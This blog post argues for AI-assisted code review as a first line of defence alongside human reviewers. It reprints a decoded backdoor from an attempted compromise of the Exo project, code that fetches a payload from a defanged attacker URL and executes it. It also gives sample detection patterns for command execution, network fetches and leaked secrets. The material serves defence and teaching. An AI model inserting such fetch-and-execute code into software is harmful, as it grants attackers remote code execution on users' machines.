AI in Code Reviews: Reducing Human Errors and Enhancing Security

💡 TL;DR (AI-generated)

AI code reviewers excel at catching security vulnerabilities, malicious code, and API key leaks, providing an automated first line of defense before human review. However, they lack understanding of broader system architecture and business context, making them best suited as complementary tools rather than replacements for human expertise.

In the era of LLM-based tools like Cursor and Copilot, we're seeing a shift in how we write code. Development is moving faster, and we're publishing more code than ever before. But what about the way we review code?

Just as AI tools have enhanced our code writing capabilities, they can also transform how we approach code reviews. An AI-powered reviewer can serve as a tireless assistant, instantly analyzing code changes for potential issues before human reviewers even begin, acting as a fully automated pre-reviewer.

The Current State of Code Reviews

While AI assistants have revolutionized code writing, code review remains a largely manual process that often forces a trade-off between speed and quality. This trade-off is most visible when:

Teams are working under tight deadlines
Pull requests are large and complex
The change touches unfamiliar parts of the codebase
Experienced reviewers have limited bandwidth

These trade-offs can be very costly for companies: a rushed review often lets through bugs, security issues, and other critical problems that can have a large impact on the product. This is where LLM-based reviewers can provide a first line of defense, highlighting potential vulnerabilities to the human reviewer and reducing the chance that they are overlooked.

Where AI Reviewers Shine

AI code reviewers are particularly good at identifying common issues in individual pieces of code, such as possible runtime errors, security vulnerabilities, API key leaks, and common anti-patterns.

1. Identifying Security Vulnerabilities

A post that recently went viral on X (Twitter) shows an attempt to inject a backdoor into Exo, a popular open-source project.

The injected code was obfuscated as Unicode characters to avoid detection. Decoded, it reads:

import os
import urllib
import urllib.request
x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
y = x.read()
z = y.decode("utf8")
x.close()
os.system(z)

In short, this patch aimed to execute remote code on the machine of every user of this library and of any project depending on it. It's unclear what the remote code was, since at the time of the pull request the remote URL did not exist; the attacker was probably waiting for the code to be deployed first.

In this case, the human reviewer was vigilant enough to spot the abnormal change within the pull request, but note that this was a rather poor attempt. Very little code was changed, and the malicious part was rather obvious. Now imagine the same payload buried in a major change with 1000+ lines of code.

This is one of the flagship use cases for AI reviewers. To demonstrate, I recreated the PR and ran my rather simplistic AI reviewer on the code change to see how well it detects the threat.

The AI reviewer spotted the issue instantly and made it very clear to everyone checking the pull request that the code poses a critical security risk.
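To make the red flags in a payload like this concrete, here is a minimal heuristic sketch in Python. It is not how the AI reviewer above works, and it is no substitute for one. The function names and patterns are hypothetical and deliberately incomplete. It scans only the added lines of a unified diff for three signals: invisible Unicode characters, a network fetch, and dynamic command execution.

```python
import re
import unicodedata

# Hypothetical, illustrative patterns; a real reviewer needs far broader coverage.
SUSPICIOUS_CALLS = re.compile(r"\b(os\.system|subprocess\.\w+|exec|eval)\s*\(")
NETWORK_FETCH = re.compile(r"\b(urlopen|requests\.(get|post))\s*\(")


def has_hidden_characters(line: str) -> bool:
    """True if the line contains invisible format or private-use characters."""
    return any(unicodedata.category(ch) in ("Cf", "Co") for ch in line)


def flag_added_lines(diff_text: str) -> list[tuple[int, str]]:
    """Return (diff line number, reason) for each suspicious added line."""
    findings = []
    for number, line in enumerate(diff_text.splitlines(), start=1):
        # Only inspect lines the change adds; skip the "+++ b/file" header.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        added = line[1:]
        if has_hidden_characters(added):
            findings.append((number, "hidden Unicode character"))
        if SUSPICIOUS_CALLS.search(added):
            findings.append((number, "dynamic command execution"))
        if NETWORK_FETCH.search(added):
            findings.append((number, "network fetch"))
    return findings
```

A fetch and a command execution appearing in the same small change, as in the payload above, is the kind of combination worth escalating to a human. Simple pattern matching like this is easy to evade, which is part of why an LLM-based reviewer that reads the change as a whole is useful.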

2. Detecting Hardcoded Secrets and API Key Leaks

One of the most obvious yet devastating mistakes developers can make is committing sensitive data, like API keys, passwords, or tokens, to source control. AI reviewers excel at spotting these by scanning for patterns resembling secrets, such as:

API keys for common services (e.g., AWS, Stripe, Google Cloud)
Passwords embedded in configuration files
Private keys accidentally included in commits

AI tools like Presubmit Reviewer can flag these instantly, even suggesting remediation steps, such as replacing the hardcoded key with environment variables or secret management solutions.
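The pattern-based part of this check can be sketched in a few lines of Python. This is a rough illustration, not Presubmit Reviewer's implementation. The rule names and regular expressions are assumptions chosen for the example, and real scanners ship much larger rule sets.

```python
import re

# Illustrative rules only (assumed for this sketch, not taken from any tool).
SECRET_PATTERNS = {
    # Long-term AWS access key IDs start with "AKIA" followed by 16 characters.
    "AWS access key ID": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    # PEM headers such as "-----BEGIN RSA PRIVATE KEY-----".
    "private key block": re.compile(r"-----BEGIN (?:[A-Z]+ )*PRIVATE KEY-----"),
    # A quoted literal assigned to a password-like name.
    "hardcoded password": re.compile(
        r"(?i)\b(?:password|passwd|secret)\b\s*[:=]\s*['\"][^'\"]{4,}['\"]"
    ),
}


def find_secrets(text: str) -> list[tuple[int, str]]:
    """Return (line number, rule name) for every line that matches a rule."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for label, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                findings.append((number, label))
    return findings
```

With these rules, a line such as `password = "hunter2!"` is flagged, while `password = os.environ["DB_PASSWORD"]` is not. The second form is the environment-variable remediation mentioned above.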

3. Catching Critical Bugs Early

AI reviewers shine in detecting critical bugs that could otherwise slip through due to human oversight:

Null Pointer Exceptions: Flagging possible null pointer dereferences before they fail at runtime.
Concurrency Issues: Identifying race conditions or improper thread synchronization.
Resource Leaks: Spotting file or network connections that are opened but not closed.
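As a small illustration of the last item, here is the kind of resource leak a reviewer might flag, next to a common fix. Both function names are hypothetical and the example is written in Python purely for illustration.

```python
def read_first_line_leaky(path: str) -> str:
    # The file is opened but never explicitly closed. Cleanup is left to the
    # garbage collector, and the handle can linger if readline() raises.
    handle = open(path, encoding="utf-8")
    return handle.readline()


def read_first_line(path: str) -> str:
    # The context manager closes the file on every exit path,
    # including when readline() raises.
    with open(path, encoding="utf-8") as handle:
        return handle.readline()
```

Both functions return the same value on the happy path, which is exactly why the leaky version tends to survive a hurried human review.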

4. Accelerating Developer Feedback Loops

Manual code reviews are time-consuming, and reviewers may miss obvious issues, especially during high-pressure sprints. AI reviewers provide immediate feedback, allowing developers to:

Resolve issues before human reviewers even see the code.
Reduce back-and-forth iterations during pull requests.
Focus human reviews on higher-level design and logic instead of routine bug detection.

This not only saves time but also ensures that critical issues are addressed early in the development lifecycle.

Where AI Reviewers Are Lacking

While AI reviewers excel at identifying specific code-level issues, they have significant limitations when it comes to understanding the broader context of a system. Let's look at where human reviewers still maintain a clear advantage:

System Architecture Context - AI reviewers can't understand how a change might impact other parts of the system that aren't directly referenced in the code
Historical Design Decisions - They lack awareness of why certain architectural choices were made, which might make their suggestions counterproductive
Business Requirements - They can't evaluate if a change actually solves the business problem it's meant to address
Performance Trade-offs - They might suggest "cleaner" code that doesn't account for specific performance requirements or scale considerations

For example, an AI reviewer might flag this code as inefficient:

// AI might suggest using a Set for O(1) lookup
const allowedUsers = ['user1', 'user2', 'user3'];

function checkAccess(userId: string) {
  return allowedUsers.includes(userId);
}

While technically correct about performance, the AI doesn't know that this is a deliberately simple implementation because the list will always be tiny and is checked infrequently. A human reviewer with context would understand that the slight performance gain isn't worth the added complexity.

Similarly, consider this database query:

// AI might flag this unbounded query as a memory risk
const results = await db.users.find({
  status: 'active',
  lastLogin: { $gt: thirtyDaysAgo }
}).toArray();

// ...and suggest capping the result set instead:
const cappedResults = await db.users.find({
  status: 'active',
  lastLogin: { $gt: thirtyDaysAgo }
}).limit(10000).toArray();

An AI reviewer might suggest adding a limit to prevent memory issues, unaware that this query is part of a nightly batch job where we deliberately need all matching records. This highlights how AI reviewers can sometimes make suggestions that conflict with the actual requirements of the system.

This is why the most effective code review process combines both AI and human reviewers. The AI can handle the mechanical aspects - catching security issues, potential bugs, and style inconsistencies - while human reviewers can focus on the higher-level concerns that require context and understanding of the broader system architecture and business requirements.

Conclusion

AI-powered code reviews represent a powerful addition to modern development workflows. As demonstrated by the Exo backdoor attempt, these AI reviewers can instantly spot potentially malicious code and security vulnerabilities that might slip through during large changes, especially under time pressure.

However, they can't replace human expertise. While great at catching specific issues, AI reviewers lack the broader context needed to understand system architecture decisions and business requirements. The future of code review lies in combining AI's tireless attention to detail with human insight - using AI as a first line of defense while allowing human reviewers to focus on architecture, business logic, and system-wide implications.

About the Author

Bogdan Stanga is a tech lead and software architect passionate about AI, code quality, and developer productivity. He is currently working on Google Search and spends the weekends building Presubmit.ai, a collection of AI-powered open-source tools for developers.